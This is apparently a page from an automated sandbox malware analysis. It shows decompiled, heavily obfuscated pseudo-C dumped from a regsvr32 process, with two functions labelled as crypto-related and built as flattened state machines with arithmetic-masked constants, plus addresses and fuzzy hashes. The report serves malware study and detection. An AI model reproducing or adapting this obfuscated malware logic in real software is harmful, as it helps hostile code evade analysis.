																}
																 *((char*)(_t432 - 0x3d)) = 1;
															}
															 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
															 *(_t432 - 4) = 6;
															 *(_t432 - 0x44) = E1001F51F(0x14);
															 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
															__eflags =  *(_t432 - 0x44);
															if( *(_t432 - 0x44) != 0) {
																L49:
																 *( *(_t432 - 0x44)) =  *( *(_t432 - 0x44)) & 0x00000000;
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t410 =  *(_t432 - 0x38) +  *(_t432 - 0x38) * 2 << 4;
																 *((short*)(_t320[5] + _t410 + 0x14)) = 0xd;
																 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
																 *(_t432 - 0x28) = _t320[5] + _t410;
																_t278 = E1000A38C( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
																_push( *(_t432 - 0x44));
																L55:
																_t169 =  *(_t432 - 0x2c) - 1; // -1
																_t419 = _t278 + _t169 &  !(_t278 - 1);
																_t281 =  *(_t432 - 0x28);
																_t346 =  *((intOrPtr*)(_t281 + 0x10)) + _t419 + 0x00000003 & 0xfffffffc;
																_t390 = _t346 + 0x00000007 & 0xfffffffc;
																_push(_t390);
																_push(_t346);
																_push(_t419);
																_push(0);
																 *(_t432 - 0x2c) = _t390;
																 *(_t432 - 0x2c) =  *(_t432 - 0x2c) + 4;
																 *(_t432 - 0x28) = _t390;
																_push(0);
																_push(0);
																_push( *((intOrPtr*)(_t281 + 0x10)));
																__eflags = 0;
																_push(0);
																_push( *((intOrPtr*)(_t281 + 8)));
																_push( *(_t432 - 0x30));
																E1000A1DB();
																_t435 = _t435 + 0x30;
																goto L56;
															} else {
																_t414 =  *(_t432 - 0x38);
																__eflags = _t414;
																if(__eflags > 0) {
																	_t430 =  *(_t432 - 0x34) + 0x14;
																	__eflags = _t430;
																	do {
																		_push( *_t430);
																		L1001F54A(_t320, _t414, _t430, __eflags);
																		_t430 = _t430 + 0x34;
																		_t414 = _t414 - 1;
																		__eflags = _t414;
																	} while (__eflags != 0);
																}
																L47:
																_push( *(_t432 - 0x34));
																L1001F54A(_t320, _t414, _t419, __eflags);
																_push(_t320[4]);
																L1001F54A(_t320, _t414, _t419, __eflags);
																_t320[4] = _t320[4] & 0x00000000;
																goto L15;
															}
														} else {
															 *(_t272 + 0x15) =  *(_t272 + 0x15) | 0x00000040;
															 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
															 *((char*)( *(_t432 - 0x38) + _t320[4])) = 1;
															 *(_t432 - 0x28) = _t320[5] + _t410;
															_t304 = E1000A38C( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
															_t90 =  *(_t432 - 0x2c) - 1; // -1
															_t419 = _t304 + _t90 &  !(_t304 - 1);
															_t392 = ( *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc) + 0x00000007 & 0xfffffffc;
															 *(_t432 - 0x28) = _t392;
															 *(_t432 - 0x2c) = _t392 + 4;
															E1000A2BB( *(_t432 - 0x30),  *((intOrPtr*)( *(_t432 - 0x28) + 8)), 0,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)), 0, 0, 0, _t419,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 0);
															_t435 = _t435 + 0x38;
															goto L56;
														}
													} else {
														_t67 = ( *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc) + 7; // 0x8
														_t396 = _t67 & 0xfffffffc;
														 *(_t432 - 0x28) = _t396;
														 *(_t432 - 0x2c) = _t396 + 4;
														_t419 = 0;
														E1000A2BB( *(_t432 - 0x30),  *((intOrPtr*)(_t272 + 8)), 0,  *(_t272 + 0x10), 0, 0, 0, 0,  *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 1);
														_t435 = _t435 + 0x34;
														L56:
														 *(_t432 - 0x30) =  *(_t432 - 0x30) + 0x34;
														 *(_t432 - 0x38) =  *(_t432 - 0x38) + 1;
														 *(_t320[5] + _t410 + 4) = _t419;
														_t405 =  *(_t432 - 0x38);
														continue;
													}
												}
											}
											goto L85;
										}
										__eflags =  *_t320;
										if( *_t320 != 0) {
											L67:
											_t320[2] = _t320[2] & 0x00000000;
											 *(_t432 - 4) = 0xa;
											_t320[2] = E1001F51F( *(_t432 - 0x2c));
											_t249 = _t320[2];
											_t405 = 0;
											__eflags = _t249;
											 *(_t432 - 4) = 0;
											if(_t249 != 0) {
												E10012400(_t249, 0,  *(_t432 - 0x2c));
												_t418 = E1000A191( *(_t432 - 0x34), _t320[3],  *_t320,  *(_t432 - 0x2c),  *(_t432 - 0x3c));
												__eflags = _t418;
												if(__eflags < 0) {
													_push(_t320[4]);
													L1001F54A(_t320, 0, _t418, __eflags);
													_t320[4] = 0;
												}
												_push( *(_t432 - 0x34));
												L1001F54A(_t320, _t405, _t418, __eflags);
												goto L81;
											} else {
												__eflags = _t320[3];
												if(__eflags > 0) {
													_t422 =  *(_t432 - 0x34) + 0x14;
													__eflags = _t422;
													do {
														_push( *_t422);
														L1001F54A(_t320, _t405, _t422, __eflags);
														_t405 = _t405 + 1;
														_t422 = _t422 + 0x34;
														__eflags = _t405 - _t320[3];
													} while (__eflags < 0);
													_t405 = 0;
													__eflags = 0;
												}
												_push( *(_t432 - 0x34));
												L1001F54A(_t320, _t405, _t419, __eflags);
												_push(_t320[4]);
												L1001F54A(_t320, _t405, _t419, __eflags);
												_t320[4] = _t405;
												goto L74;
											}
										} else {
											_push(1);
											_t263 = E1000A12D(_t320);
											__eflags = _t263;
											 *(_t432 - 0x38) = _t263;
											if(_t263 >= 0) {
												 *((char*)( *_t320 + 4)) = 1;
												goto L67;
											} else {
												_t423 = 0;
												__eflags = _t320[3];
												if(__eflags > 0) {
													_t408 =  *(_t432 - 0x34) + 0x14;
													__eflags = _t408;
													do {
														_push( *_t408);
														L1001F54A(_t320, _t408, _t423, __eflags);
														_t423 = _t423 + 1;
														_t408 = _t408 + 0x34;
														__eflags = _t423 - _t320[3];
													} while (__eflags < 0);
												}
												_push( *(_t432 - 0x34));
												L1001F54A(_t320, _t405, _t423, __eflags);
												_push(_t320[4]);
												L1001F54A(_t320, _t405, _t423, __eflags);
												_t267 =  *(_t432 - 0x3c);
												_t320[4] = _t320[4] & 0x00000000;
												 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
												__eflags = _t267;
												goto L63;
											}
										}
									} else {
										_push( *(_t432 - 0x34));
										L1001F54A(_t320, 0, _t419, __eflags);
										L74:
										_t260 =  *(_t432 - 0x3c);
										 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
										__eflags = _t260 - _t405;
										goto L75;
									}
								} else {
									L15:
									_t260 =  *(_t432 - 0x3c);
									 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
									__eflags = _t260;
									L75:
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t260 + 8))(_t260);
									}
									_t254 = 0x8007000e;
								}
							} else {
								__eflags = _t315;
								if(_t315 != 0) {
									 *((intOrPtr*)( *_t315 + 8))(_t315);
								}
								L81:
								_t253 =  *(_t432 - 0x3c);
								 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
								__eflags = _t253 - _t405;
								goto L82;
							}
						} else {
							__eflags = _t313;
							 *(_t432 - 4) = 0;
							if(_t313 != 0) {
								 *((intOrPtr*)( *_t313 + 8))(_t313);
							}
							_t267 =  *(_t432 - 0x3c);
							 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
							__eflags = _t267;
							L63:
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t267 + 8))(_t267);
							}
							_t254 =  *(_t432 - 0x38);
						}
					}
				} else {
					_t253 =  *(_t432 - 0x3c);
					 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
					_t439 = _t253;
					L82:
					if(_t439 != 0) {
						 *((intOrPtr*)( *_t253 + 8))(_t253);
					}
					_t254 = _t418;
				}
				L85:
				 *[fs:0x0] =  *((intOrPtr*)(_t432 - 0xc));
				return E10011A49(_t254,  *((intOrPtr*)(_t432 - 0x14)));
			}

0x1000df51
0x1000df56
0x1000df59
0x1000df5e
0x1000df6d
0x1000df6e
0x1000df6f
0x1000df70
0x1000df72
0x1000df75
0x1000df78
0x1000df7b
0x1000df7c
0x1000df80
0x1000df85
0x1000df95
0x1000df99
0x1000dfab
0x1000dfae
0x1000dfb0
0x1000dfb3
0x1000e032
0x00000000
0x1000dfb5
0x1000dfb5
0x1000dfb8
0x1000dfc7
0x1000dfcb
0x1000dfcd
0x1000dfd0
0x1000dfd2
0x1000dfd5
0x1000dfff
0x1000e002
0x1000e004
0x1000e006
0x1000e009
0x1000e00d
0x1000e022
0x1000e024
0x1000e028
0x1000e02d
0x1000e02d
0x1000e036
0x1000e03d
0x1000e040
0x1000e04a
0x1000e060
0x1000e064
0x1000e068
0x1000e07b
0x1000e085
0x1000e09b
0x1000e09d
0x1000e0a0
0x1000e0a3
0x1000e0b5
0x1000e0b8
0x1000e0bb
0x1000e0bb
0x1000e0be
0x00000000
0x00000000
0x1000e0c7
0x1000e0d1
0x1000e0d4
0x1000e0d9
0x1000e0dc
0x1000e277
0x1000e277
0x1000e27b
0x1000e27f
0x1000e332
0x1000e337
0x1000e339
0x1000e339
0x1000e339
0x1000e339
0x1000e33f
0x1000e341
0x1000e347
0x1000e350
0x1000e350
0x1000e356
0x1000e356
0x1000e358
0x1000e360
0x1000e365
0x00000000
0x1000e285
0x1000e285
0x1000e28b
0x1000e295
0x1000e2ab
0x1000e2af
0x1000e2b3
0x00000000
0x1000e2b5
0x1000e2b5
0x1000e2b8
0x1000e2ba
0x1000e2bf
0x1000e2bf
0x1000e2c2
0x1000e2c2
0x1000e2c4
0x1000e2c9
0x1000e2cc
0x1000e2cc
0x1000e2cd
0x1000e2c2
0x00000000
0x1000e2ba
0x1000e2b3
0x1000e0e2
0x1000e0e2
0x1000e0e7
0x00000000
0x1000e0ed
0x1000e0ed
0x1000e0f0
0x1000e0f3
0x1000e144
0x1000e147
0x1000e1d4
0x1000e1d8
0x1000e1e7
0x1000e1eb
0x1000e1f2
0x1000e1f9
0x1000e1fc
0x1000e1ff
0x1000e204
0x1000e207
0x1000e210
0x1000e213
0x1000e215
0x00000000
0x1000e215
0x1000e209
0x1000e209
0x1000e21a
0x1000e21d
0x1000e21e
0x1000e21f
0x1000e220
0x1000e220
0x1000e221
0x1000e221
0x1000e225
0x1000e22b
0x1000e235
0x1000e24b
0x1000e24f
0x1000e253
0x1000e2f0
0x1000e2f3
0x1000e2f9
0x1000e2fa
0x1000e2fb
0x1000e2fc
0x1000e306
0x1000e309
0x1000e313
0x1000e320
0x1000e328
0x1000e32d
0x1000e367
0x1000e36a
0x1000e371
0x1000e373
0x1000e37d
0x1000e383
0x1000e386
0x1000e387
0x1000e38d
0x1000e38e
0x1000e390
0x1000e393
0x1000e397
0x1000e39a
0x1000e3a0
0x1000e3a1
0x1000e3a4
0x1000e3aa
0x1000e3ab
0x1000e3ae
0x1000e3b1
0x1000e3b6
0x00000000
0x1000e255
0x1000e255
0x1000e258
0x1000e25a
0x1000e25f
0x1000e25f
0x1000e262
0x1000e262
0x1000e264
0x1000e269
0x1000e26c
0x1000e26c
0x1000e26d
0x1000e270
0x1000e2d0
0x1000e2d0
0x1000e2d3
0x1000e2d8
0x1000e2db
0x1000e2e0
0x00000000
0x1000e2e5
0x1000e14d
0x1000e14d
0x1000e157
0x1000e162
0x1000e16b
0x1000e173
0x1000e17b
0x1000e182
0x1000e194
0x1000e197
0x1000e19d
0x1000e1c7
0x1000e1cc
0x00000000
0x1000e1cc
0x1000e0f5
0x1000e0fe
0x1000e103
0x1000e106
0x1000e10c
0x1000e116
0x1000e137
0x1000e13c
0x1000e3b9
0x1000e3b9
0x1000e3c0
0x1000e3c3
0x1000e3c7
0x00000000
0x1000e3c7
0x1000e0f3
0x1000e0e7
0x00000000
0x1000e0dc
0x1000e3cf
0x1000e3d2
0x1000e437
0x1000e43a
0x1000e43e
0x1000e448
0x1000e45e
0x1000e461
0x1000e463
0x1000e465
0x1000e468
0x1000e4ba
0x1000e4d2
0x1000e4d7
0x1000e4d9
0x1000e4db
0x1000e4de
0x1000e4e4
0x1000e4e4
0x1000e4e7
0x1000e4ea
0x00000000
0x1000e46a
0x1000e46a
0x1000e46d
0x1000e472
0x1000e472
0x1000e475
0x1000e475
0x1000e477
0x1000e47c
0x1000e47d
0x1000e480
0x1000e483
0x1000e486
0x1000e486
0x1000e486
0x1000e488
0x1000e48b
0x1000e490
0x1000e493
0x1000e499
0x00000000
0x1000e499
0x1000e3d4
0x1000e3d4
0x1000e3d8
0x1000e3dd
0x1000e3df
0x1000e3e2
0x1000e433
0x00000000
0x1000e3e4
0x1000e3e4
0x1000e3e6
0x1000e3e9
0x1000e3ee
0x1000e3ee
0x1000e3f1
0x1000e3f1
0x1000e3f3
0x1000e3f8
0x1000e3f9
0x1000e3fc
0x1000e3ff
0x1000e3f1
0x1000e402
0x1000e405
0x1000e40a
0x1000e40d
0x1000e412
0x1000e415
0x1000e419
0x1000e41f
0x00000000
0x1000e41f
0x1000e3e2
0x1000e0a5
0x1000e0a5
0x1000e0a8
0x1000e49c
0x1000e49c
0x1000e49f
0x1000e4a4
0x00000000
0x1000e4a4
0x1000e06a
0x1000e06a
0x1000e06a
0x1000e06d
0x1000e071
0x1000e4a6
0x1000e4a6
0x1000e4ab
0x1000e4ab
0x1000e4ae
0x1000e4ae
0x1000e00f
0x1000e00f
0x1000e011
0x1000e01a
0x1000e01a
0x1000e4f0
0x1000e4f0
0x1000e4f3
0x1000e4f7
0x00000000
0x1000e4f7
0x1000dfd7
0x1000dfd7
0x1000dfd9
0x1000dfdd
0x1000dfe2
0x1000dfe2
0x1000dfe5
0x1000dfe8
0x1000dfec
0x1000e421
0x1000e421
0x1000e426
0x1000e426
0x1000e429
0x1000e429
0x1000dfd5
0x1000df9b
0x1000df9b
0x1000df9e
0x1000dfa2
0x1000e4f9
0x1000e4f9
0x1000e4fe
0x1000e4fe
0x1000e501
0x1000e501
0x1000e503
0x1000e506
0x1000e519

APIs

__EH_prolog.LIBCMT ref: 1000DF51

Strings

4, xrefs: 1000E3B9

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog
String ID: 4
API String ID: 3519838083-4088798008
Opcode ID: 447a6d02cb527a506ddcdfaa315db1419b665af9307a92117742056a5c16377f
Instruction ID: 4eea4a1366638f7d7f45dbc7dadb66f750c21cb958151908c1317702c2287141
Opcode Fuzzy Hash: 447a6d02cb527a506ddcdfaa315db1419b665af9307a92117742056a5c16377f
Instruction Fuzzy Hash: 8712A071900244EFDB19CF98D884A9EBBB6EF44350F258199F815BF2A6C771ED81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04F6593C Relevance: 4.0, Strings: 3, Instructions: 216
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04F6593C(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t192;
				void* _t194;
				intOrPtr _t199;
				intOrPtr _t206;
				intOrPtr _t207;
				intOrPtr _t212;
				intOrPtr _t213;
				intOrPtr* _t221;
				intOrPtr _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t241;
				intOrPtr _t242;
				signed int* _t246;

				_t222 = __ecx;
				_push(_a12);
				_t241 = _a8;
				_t221 = __edx;
				_push(_t241);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t192);
				_t246 =  &(( &_v40)[5]);
				_v16 = 0x5f104;
				_t242 = 0;
				_v12 = 0x5e4c7;
				_t194 = 0x23b84;
				do {
					while(_t194 != 0x1c62e) {
						if(_t194 == 0x23b84) {
							_t194 = 0xdc55e;
							continue;
						} else {
							if(_t194 == 0xdc55e) {
								_v28 = 0xf3ed62;
								_t223 = 0x72;
								_push(_t223);
								_v28 = _v28 * 0xa;
								_v28 = _v28 ^ 0xda3ae223;
								_v28 = _v28 ^ 0xd3bda7f6;
								_v32 = 0x6e5ba0;
								_v32 = _v32 * 0x3f;
								_v32 = _v32 ^ 0x1b21f9db;
								_v20 = 0x67cdcc;
								_v20 = _v20 + 0x5df6;
								_v20 = _v20 ^ 0x00635606;
								_v16 = 0x602a09;
								_v16 = _v16 | 0xbd5d62e4;
								_v16 = _v16 ^ 0xbd7b03fa;
								_v40 = 0x58a9c4;
								_v40 = _v40 + 0xffff7f15;
								_v40 = _v40 | 0x0a5edb5a;
								_v40 = _v40 >> 3;
								_v40 = _v40 ^ 0x01468081;
								_v36 = 0x506b8b;
								_v36 = _v36 << 0xd;
								_v36 = _v36 / _t223;
								_v36 = _v36 + 0xffffe189;
								_v36 = _v36 ^ 0x001008a4;
								_v24 = 0x5940f6;
								_v24 = _v24 + 0xffff67b0;
								_v24 = _v24 ^ 0x4b537043;
								_v24 = _v24 ^ 0x4b006c72;
								_t206 =  *0x4f8220c; // 0x0
								_t222 =  *_t221;
								_t207 = E04F62E29(_t222, _v32, _v20, _t223, _t242, _v16, _t242,  *((intOrPtr*)(_t221 + 4)), _v40, _v36, _v28, _v24,  *((intOrPtr*)(_t206 + 0x60)),  &_v4);
								_t246 =  &(_t246[0xe]);
								__eflags = _t207;
								if(__eflags == 0) {
									_t194 = 0x1c62e;
									continue;
								}
							} else {
								if(_t194 == 0xe1ba2) {
									_v20 = 0x561eeb;
									_v20 = _v20 + 0x3790;
									_v20 = _v20 ^ 0x0056567a;
									_v36 = 0x70f3b1;
									_t224 = 0x4e;
									_push(_t224);
									_v36 = _v36 / _t224;
									_v36 = _v36 << 0x10;
									_v36 = _v36 << 0xc;
									_v36 = _v36 ^ 0x60089b0b;
									_v16 = 0xbc9c75;
									_v16 = _v16 + 0xd278;
									_v16 = _v16 ^ 0x00b1a92e;
									_v40 = 0x8cd5ee;
									_v40 = _v40 + 0xffff2327;
									_v40 = _v40 * 0x76;
									_v40 = _v40 << 2;
									_v40 = _v40 ^ 0x021d9b90;
									_v24 = 0x8a9b49;
									_v24 = _v24 >> 5;
									_v24 = _v24 << 0xc;
									_v24 = _v24 ^ 0x45418cf9;
									_v28 = 0xa6c76e;
									_v28 = _v28 << 2;
									_v28 = _v28 << 0xd;
									_v28 = _v28 ^ 0x63b0bd7e;
									_v32 = 0x2bfa1d;
									_v32 = _v32 >> 3;
									_v32 = _v32 + 0xffffa8ba;
									_v32 = _v32 ^ 0x0007a9fc;
									_t212 =  *0x4f8220c; // 0x0
									_t222 =  *_t221;
									_t213 = E04F62E29(_t222, _v36, _v16, _t224, _v8, _v40, _v4,  *((intOrPtr*)(_t221 + 4)), _v24, _v28, _v20, _v32,  *((intOrPtr*)(_t212 + 0x60)),  &_v4);
									_t246 =  &(_t246[0xe]);
									__eflags = _t213;
									if(__eflags == 0) {
										 *_t241 = _v8;
										_t242 = 1;
										__eflags = 1;
										 *((intOrPtr*)(_t241 + 4)) = _v4;
									} else {
										_t194 = 0xf3951;
										continue;
									}
								} else {
									_t252 = _t194 - 0xf3951;
									if(_t194 != 0xf3951) {
										goto L15;
									} else {
										_v40 = 0x7f1fda;
										_v40 = _v40 + 0x3e08;
										_v40 = _v40 + 0xeff7;
										_t225 = 0x5f;
										_v40 = _v40 / _t225;
										_v40 = _v40 ^ 0x0005a846;
										_v16 = 0x42a042;
										_v16 = _v16 | 0x26198877;
										_v16 = _v16 ^ 0x2655eabb;
										_v36 = 0x7ccd22;
										_t226 = 0x7c;
										_v36 = _v36 / _t226;
										_v36 = _v36 ^ 0xd33c8283;
										_v36 = _v36 >> 1;
										_v36 = _v36 ^ 0x699395c3;
										E04F7E4B2(_v40, _v16, _t252, _v36, _v8);
									}
								}
							}
						}
						L18:
						return _t242;
					}
					_v40 = 0x428c31;
					_v40 = _v40 * 0xd;
					_v40 = _v40 * 0xe;
					_v40 = _v40 ^ 0x6813eab5;
					_v40 = _v40 ^ 0x4752d3ed;
					_v36 = 0x2d2699;
					_v36 = _v36 + 0xffffe646;
					_v36 = _v36 | 0xe61652ad;
					_v36 = _v36 ^ 0x2166dfc1;
					_v36 = _v36 ^ 0xc759d5f0;
					_t199 = E04F73EE6(_t222, _v4, __eflags);
					_v8 = _t199;
					_t222 = _t222;
					__eflags = _t199;
					if(__eflags == 0) {
						_t194 = 0x3a9a0;
						goto L15;
					} else {
						_t194 = 0xe1ba2;
						continue;
					}
					goto L18;
					L15:
					__eflags = _t194 - 0x3a9a0;
				} while (__eflags != 0);
				goto L18;
			}

0x04f6593c
0x04f65943
0x04f65947
0x04f6594b
0x04f6594d
0x04f6594e
0x04f65952
0x04f65953
0x04f65954
0x04f65959
0x04f6595c
0x04f65964
0x04f65966
0x04f6596e
0x04f65978
0x04f65978
0x04f65985
0x04f65c80
0x00000000
0x04f6598b
0x04f65990
0x04f65b5c
0x04f65b6d
0x04f65b6e
0x04f65b6f
0x04f65b73
0x04f65b7b
0x04f65b83
0x04f65b90
0x04f65b94
0x04f65b9c
0x04f65ba4
0x04f65bac
0x04f65bb4
0x04f65bbc
0x04f65bc4
0x04f65bcc
0x04f65bd4
0x04f65bdc
0x04f65be4
0x04f65be9
0x04f65bf1
0x04f65bf9
0x04f65c04
0x04f65c0c
0x04f65c14
0x04f65c1c
0x04f65c24
0x04f65c2c
0x04f65c34
0x04f65c3d
0x04f65c67
0x04f65c69
0x04f65c6e
0x04f65c71
0x04f65c73
0x04f65c79
0x00000000
0x04f65c79
0x04f65996
0x04f6599b
0x04f65a3a
0x04f65a44
0x04f65a4c
0x04f65a54
0x04f65a62
0x04f65a65
0x04f65a66
0x04f65a6a
0x04f65a6f
0x04f65a74
0x04f65a7c
0x04f65a84
0x04f65a8c
0x04f65a94
0x04f65a9c
0x04f65aa9
0x04f65ab1
0x04f65ab6
0x04f65abe
0x04f65ac6
0x04f65acb
0x04f65ad0
0x04f65ad8
0x04f65ae0
0x04f65ae5
0x04f65aea
0x04f65af2
0x04f65afa
0x04f65aff
0x04f65b07
0x04f65b10
0x04f65b40
0x04f65b42
0x04f65b47
0x04f65b4a
0x04f65b4c
0x04f65d19
0x04f65d1b
0x04f65d1b
0x04f65d20
0x04f65b52
0x04f65b52
0x00000000
0x04f65b52
0x04f659a1
0x04f659a1
0x04f659a6
0x00000000
0x04f659ac
0x04f659ac
0x04f659b6
0x04f659be
0x04f659cc
0x04f659d1
0x04f659d7
0x04f659df
0x04f659e7
0x04f659ef
0x04f659f7
0x04f65a03
0x04f65a06
0x04f65a0a
0x04f65a12
0x04f65a16
0x04f65a2e
0x04f65a34
0x04f659a6
0x04f6599b
0x04f65990
0x04f65d24
0x04f65d2c
0x04f65d2c
0x04f65c8a
0x04f65c98
0x04f65ca1
0x04f65ca5
0x04f65cad
0x04f65cb5
0x04f65cbd
0x04f65cc5
0x04f65ccd
0x04f65cd5
0x04f65ce9
0x04f65cee
0x04f65cf2
0x04f65cf3
0x04f65cf5
0x04f65d01
0x00000000
0x04f65cf7
0x04f65cf7
0x00000000
0x04f65cf7
0x00000000
0x04f65d06
0x04f65d06
0x04f65d06
0x00000000

Strings

rl, xrefs: 04F65C34
CpSK, xrefs: 04F65C2C
*`, xrefs: 04F65BB4

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *`$CpSK$rl
API String ID: 0-1120149825
Opcode ID: 245d4c17b8552b1a8dc048701071438e954c0c020d9c1ee388628dea6b831880
Instruction ID: fa46ac95de79df458a1efd6404cca20a0d78b781d75302a314f4e7ec4904c648
Opcode Fuzzy Hash: 245d4c17b8552b1a8dc048701071438e954c0c020d9c1ee388628dea6b831880
Instruction Fuzzy Hash: D5A1247250D3429FC718CF25EA4980BBBE1FB88758F00491EF186A6260D3B5DA49CF97

Uniqueness

Uniqueness Score: -1.00%

Function 04F7F7FE Relevance: 3.9, Strings: 3, Instructions: 199
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04F7F7FE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t162;
				void* _t164;
				void* _t169;
				void* _t171;
				void* _t174;
				void* _t186;
				signed int _t189;
				signed int _t196;
				signed int _t197;
				intOrPtr _t218;
				signed int* _t221;

				_t217 = _a16;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t162);
				_t221 =  &(( &_v60)[6]);
				_v48 = 0xc41e8;
				_t218 = 0;
				_v44 = 0x776f3;
				_t164 = 0x4523;
				_v40 = 0;
				while(_t164 != 0x4523) {
					if(_t164 == 0x2499f) {
						_v60 = 0xf42ea1;
						_v60 = _v60 + 0x3efb;
						_v60 = _v60 ^ 0x00f11131;
						_v56 = 0xd5aa9c;
						_v56 = _v56 << 5;
						_v56 = _v56 ^ 0xe25493c3;
						_v56 = _v56 ^ 0xf8e0cfaf;
						_v52 = 0x116a4;
						_v52 = _v52 >> 2;
						_t189 = 0x31;
						_v52 = _v52 / _t189;
						_v52 = _v52 ^ 0x0003143a;
						_t169 = E04F7BF19(_v60, _t217 + 0x10, _v56,  &_v36, _v52);
						_t221 =  &(_t221[3]);
						__eflags = _t169;
						if(__eflags != 0) {
							_t164 = 0x5d143;
							continue;
						}
					} else {
						if(_t164 == 0x26bfd) {
							_v56 = 0xd66b2f;
							_v56 = _v56 ^ 0xe2696150;
							_v56 = _v56 >> 6;
							_v56 = _v56 ^ 0x038debc4;
							_v60 = 0xf4bf5;
							_v60 = _v60 >> 5;
							_v60 = _v60 ^ 0x0007b63b;
							_v52 = 0x484f2e;
							_v52 = _v52 << 0xc;
							_v52 = _v52 << 7;
							_v52 = _v52 ^ 0x797c5b1d;
							_t171 = E04F7BF19(_v56, _t217 + 0x28, _v60,  &_v36, _v52);
							_t221 =  &(_t221[3]);
							__eflags = _t171;
							if(__eflags != 0) {
								_t164 = 0x3056b;
								continue;
							}
						} else {
							if(_t164 == 0x3056b) {
								_v52 = 0xa4da44;
								_v52 = _v52 | 0x846382d0;
								_v52 = _v52 * 0x68;
								_v52 = _v52 ^ 0xfe3d18ea;
								_v60 = 0xeafb6b;
								_v60 = _v60 ^ 0x26f9cf2a;
								_v60 = _v60 << 0xa;
								_v60 = _v60 >> 3;
								_v60 = _v60 ^ 0x09912e21;
								_v56 = 0x4be6bb;
								_v56 = _v56 >> 9;
								_v56 = _v56 + 0xffffd5d0;
								_v56 = _v56 ^ 0xfff52c87;
								_t174 = E04F7BF19(_v52, _t217 + 0x30, _v60,  &_v36, _v56);
								_t221 =  &(_t221[3]);
								__eflags = _t174;
								if(__eflags != 0) {
									_t164 = 0x2499f;
									continue;
								}
							} else {
								if(_t164 == 0x59bc1) {
									_v52 = 0x61c1bd;
									_v52 = _v52 >> 7;
									_v52 = _v52 ^ 0x0008372f;
									_v60 = 0x438000;
									_v60 = _v60 + 0xffff8ffd;
									_v60 = _v60 << 8;
									_v60 = _v60 * 0x37;
									_v60 = _v60 ^ 0x6863ede5;
									_t50 =  &_v60; // 0x6863ede5
									E04F80484(_v52, _a4,  &_v36,  *_t50);
									_t164 = 0x6573d;
									continue;
								} else {
									if(_t164 == 0x5d143) {
										_v56 = 0x127a52;
										_t196 = 0x5a;
										_v56 = _v56 / _t196;
										_v56 = _v56 << 0xd;
										_v56 = _v56 + 0x9132;
										_v56 = _v56 ^ 0x069be210;
										_v60 = 0x928cb1;
										_v60 = _v60 + 0xffff99d2;
										_v60 = _v60 << 0xc;
										_t197 = 0x4c;
										_v60 = _v60 / _t197;
										_v60 = _v60 ^ 0x007b5311;
										__eflags = E04F6D362(_v56, _v60, __eflags,  &_v36, _t217 + 0x18);
										_t218 =  !=  ? 1 : _t218;
									} else {
										if(_t164 != 0x6573d) {
											L18:
											__eflags = _t164 - 0x481f3;
											if(__eflags != 0) {
												continue;
											} else {
											}
										} else {
											_v60 = 0xb6538e;
											_v60 = _v60 ^ 0x7d7f82c2;
											_v60 = _v60 | 0x36ad97e2;
											_v60 = _v60 ^ 0xe9dbf4ad;
											_v60 = _v60 ^ 0x963e9add;
											_v56 = 0x35b285;
											_v56 = _v56 << 6;
											_v56 = _v56 >> 0xf;
											_v56 = _v56 ^ 0x000d8537;
